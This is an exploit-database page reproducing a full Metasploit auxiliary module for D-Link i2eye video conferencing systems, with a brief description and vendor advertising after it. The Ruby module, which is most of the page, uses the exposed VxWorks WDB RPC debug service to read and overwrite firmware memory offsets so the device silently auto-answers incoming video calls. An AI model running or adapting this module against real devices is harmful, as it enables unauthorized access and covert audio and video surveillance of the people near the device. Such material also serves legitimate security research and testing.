Lucene search
K

D-Link I2eye Video Conference AutoAnswer (WDBRPC)

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 133 Views

D-Link i2eye Video Conference AutoAnswer (WDBRPC) module enables auto-answer mode for D-Link i2eye video conferencing, allowing unacknowledged incoming video calls. The i2eye product is no longer supported and has reached end of life (EOL).

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::WDBRPC_Client  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'D-Link i2eye Video Conference AutoAnswer (WDBRPC)',  
'Description' => %q{  
This module can be used to enable auto-answer mode for the D-Link  
i2eye video conferencing system. Once this setting has been flipped,  
the device will accept incoming video calls without acknowledgement.  
The NetMeeting software included in Windows XP can be used to connect  
to this device. The i2eye product is no longer supported by the vendor  
and all models have reached their end of life (EOL).  
},  
'Author' => [ 'hdm'],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['OSVDB', '66842'],  
['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],  
['US-CERT-VU', '362332']  
]  
))  
end  
  
def run  
target = nil  
targets = {  
# Original firmware for the North America DVC1000  
"Sorenson VP100 - ARM9TDMI" => [[0x00229a05, 0x00000000, 0x00000001]],  
  
# Final firmware for the North America DVC1000  
# Also covers a mislabeled "Sorenson VP100" (revision A3)  
"i-2-eye DVC1000 - ARM9TDMI" => [  
[0x0040cd68, 0x00000000, 0x01000000],  
[0x0040af38, 0x00000000, 0x01000000],  
[0x0040cd00, 0x00000000, 0x01000000]  
],  
}  
  
  
wdbrpc_client_connect  
  
if not @wdbrpc_info[:rt_vers]  
print_error("No response to connection request")  
return  
end  
  
membase = @wdbrpc_info[:rt_membase]  
  
target = targets[@wdbrpc_info[:rt_bsp_name]]  
if not target  
print_error("No target available for BSP #{@wdbrpc_info[:rt_bsp_name]}")  
wdbrpc_client_disconnect  
return  
end  
  
target.each do |r|  
offset, oldval, newval = r  
  
curr = wdbrpc_client_memread(membase + offset, 4).unpack("N")[0]  
if curr != oldval and curr != newval  
print_error("The value at offset #{"0x%.8x" % offset} does not match this target (#{"0x%.8x" % curr}), skipping...")  
next  
end  
  
if curr == newval  
print_good("The value at offset #{"0x%.8x" % offset} has already been set")  
else  
wdbrpc_client_memwrite(membase + offset, [newval].pack("N"))  
curr = wdbrpc_client_memread(membase + offset, 4).unpack("N")[0]  
print_good("The value at offset #{"0x%.8x" % offset} has been set to #{"0x%.8x" % curr}")  
end  
  
print_status("The target device should now automatically accept incoming calls")  
end  
  
wdbrpc_client_disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation